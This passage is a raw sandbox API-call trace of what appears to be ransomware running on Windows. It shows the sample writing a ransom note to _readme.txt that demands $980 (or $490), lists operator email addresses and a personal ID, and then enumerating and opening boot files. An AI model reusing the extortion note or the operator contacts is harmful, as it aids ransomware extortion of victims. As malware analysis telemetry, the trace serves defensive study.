lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.639] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0179.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.639] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.639] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.639] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.640] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*" (normalized: "c:\\boot\\zh-cn\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.641] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.641] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.641] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0179.641] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.668] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.668] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.681] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.728] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x6a0000, 